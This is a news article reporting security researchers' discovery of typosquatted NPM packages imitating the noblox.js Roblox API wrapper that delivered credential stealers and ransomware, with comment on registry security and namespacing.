NPM packages disguised as Roblox API code caught carrying ransomware

Subverted libraries likely intended as a prank but should be taken seriously, say security researchers


Yet another NPM library has turned up infected with malware. Security firm Sonatype on Wednesday said it had spotted two related malicious NPM libraries that were named so they might be mistaken for a popular legitimate module that serves as a Roblox API wrapper.

The two poisoned libraries – ​​noblox.js-proxy and noblox.js -proxies – were typosquatting (named to be confusingly similar to) noblox.js, a Roblox game API wrapper available on NPM and as a standalone download. Roblox is a gaming platform with more than 40 million daily active users.

It was only last week that the Cybersecurity and Infrastructure Security Agency (CISA) published an advisory about another compromised NPM library, ua-parser.js. And only a few days earlier, Sonatype spotted three more NPM libraries packed with cryptomining code.

Attacks on the software supply chain, particularly efforts to target popular code registries like NPM, PyPI, and RubyGems, have unfortunately become commonplace.

The legitimate noblox.js is downloaded about 22,000 times a month from NPM and, according to Sonatype, has been downloaded more than 700,000 times. That kind of volume increases the odds that some developer will mistake a malicious variant for the real thing.

Sonatype spotted the villainous modules on October 20th and 26th, before much damage could be done. GitHub, which now operates NPM, is said to have removed the bad code within an hour of Sonatype's report.

"Since we discovered the two typosquats so quickly, they both had minimal impact with noblox.js-proxy seeing 281 total downloads and noblox.js-proxies seeing 106 total downloads, but it’s clear what type of scale the threat actors were hoping for going after such a popular component," said Juan Aguirre, a security researcher at Sonatype in a blog post.

Seemingly a new frontier for ransomware

But Aguirre observes that the malicious libraries contained trojans and ransomware, the latter of which hasn't been seen before in package registry subversion attempts.

The lookalike libraries copied the appearance of the noblox.js GitHub repo, but they included a postinstall script that contained a suspiciously obfuscated function.

The referenced Windows Batch file proved to be deliberately obscured through various encoding techniques, but Aguirre ultimately was able to determine that the Batch script initially tries bypassing Windows User Account Control with a Windows binary called fodhelper. It subsequently uses Powershell download "cradles" – a single line command for downloading code and running it – to fetch various malicious executables.

The files – exclude.bat, legion.exe, 000.exe, and tunamor.exe – were gathered from Discord's CDN server, which has become a popular malware distribution mechanism.

The first, exclude.bat, tries to disable antivirus programs. The second, legion.exe, tries to drop various files for stealing Discord tokens and stored browser and system credentials.

The third, 000.exe, drops nuisance executables and a video that's supposed to be ominous. And the fourth, tunamor.exe, shows up in VirusTotal as a Remote Access Trojan, or RAT, that appears to be related to TAIDOOR.

"Taking a look at the executable itself, we can see this isn't just a RAT, this is ransomware and it's likely our bad actors are after a payday," said Aguirre.

Or maybe a belated Halloween prank

However, Aguirre sees the textual hints in the code and the moody video as a sign that this incident is more likely to be a prank attack than a serious operation.

And his colleague, Ax Sharma, a senior security researcher and advocate at Sonatype, said much the same in an email to The Register.

"While the trojans and ransomware within this package are fully functional, we have reason to believe this is a prank more than an actual, profitable operation for them – the presence of a 'spooky' video and what appears to be MBRLocker ransomware are big indicators," said Sharma.

"The bigger implication to keep in mind is that threat actors can infiltrate open source ecosystems through near-miss typosquats or dependency confusion hijacks and use it to distribute ransomware, which is what’s novel about this particular effort. This is the first time we’ve seen ransomware distributed as part of a malicious attack on an open source ecosystem."

Asked why NPM failed to catch these bad packages when they were created, Sharma said it's a consequence of open source ecosystems and registries needing to maintain low barriers to entry so anyone in the community has an easy way to contribute.

"The downside to this, however, means keeping malware out of registries can be a challenge," said Sharma. "Further complicating the matter is a gray area where security researchers will post proof-of-concept test packages as a part of research or bug bounty activities. What is seen as an effort to be more open, unfortunately means many open source registries don’t have strict security validations that could keep malicious typosquats and packages out."

Sharma said the lack of strict namespacing in repositories like NPM, PyPI, and RubyGems exacerbates the problem.

"Strict namespacing is deeply enforced in repositories like Sonatype’s Maven Central and GoLang’s pkg.go.dev," explained Sharma.

"For example, a threat actor could not just publish a malicious package to Maven Central under the org.apache namespace that could be mistaken for an official Apache package – they would have to first prove they own the apache.org domain. This is one of the deterrents we have in place to minimize the possibility of and impact from any malicious code uploads." ®


Other stories you might like

  • GPL legal battle: Vizio told by judge it will have to answer breach-of-contract claims
    Fine-print crucially deemed contractual agreement as well as copyright license in smartTV source-code case

    The Software Freedom Conservancy (SFC) has won a significant legal victory in its ongoing effort to force Vizio to publish the source code of its SmartCast TV software, which is said to contain GPLv2 and LGPLv2.1 copyleft-licensed components.

    SFC sued Vizio, claiming it was in breach of contract by failing to obey the terms of the GPLv2 and LGPLv2.1 licenses that require source code to be made public when certain conditions are met, and sought declaratory relief on behalf of Vizio TV owners. SFC wanted its breach-of-contract arguments to be heard by the Orange County Superior Court in California, though Vizio kicked the matter up to the district court level in central California where it hoped to avoid the contract issue and defend its corner using just federal copyright law.

    On Friday, Federal District Judge Josephine Staton sided with SFC and granted its motion to send its lawsuit back to superior court. To do so, Judge Staton had to decide whether or not the federal Copyright Act preempted the SFC's breach-of-contract allegations; in the end, she decided it didn't.

    Continue reading
  • US brings first-of-its-kind criminal charges of Bitcoin-based sanctions-busting
    Citizen allegedly moved $10m-plus in BTC into banned nation

    US prosecutors have accused an American citizen of illegally funneling more than $10 million in Bitcoin into an economically sanctioned country.

    It's said the resulting criminal charges of sanctions busting through the use of cryptocurrency are the first of their kind to be brought in the US.

    Under the United States' International Emergency Economic Powers Act (IEEA), it is illegal for a citizen or institution within the US to transfer funds, directly or indirectly, to a sanctioned country, such as Iran, Cuba, North Korea, or Russia. If there is evidence the IEEA was willfully violated, a criminal case should follow. If an individual or financial exchange was unwittingly involved in evading sanctions, they may be subject to civil action. 

    Continue reading
  • Meta hires network chip guru from Intel: What does this mean for future silicon?
    Why be a customer when you can develop your own custom semiconductors

    Analysis Here's something that should raise eyebrows in the datacenter world: Facebook parent company Meta has hired a veteran networking chip engineer from Intel to lead silicon design efforts in the internet giant's infrastructure hardware engineering group.

    Jon Dama started as director of silicon in May for Meta's infrastructure hardware group, a role that has him "responsible for several design teams innovating the datacenter for scale," according to his LinkedIn profile. In a blurb, Dama indicated that a team is already in place at Meta, and he hopes to "scale the next several doublings of data processing" with them.

    Though we couldn't confirm it, we think it's likely that Dama is reporting to Alexis Bjorlin, Meta's vice president of infrastructure hardware who previously worked with Dama when she was general manager of Intel's Connectivity group before serving a two-year stint at Broadcom.

    Continue reading

Biting the hand that feeds IT © 1998–2022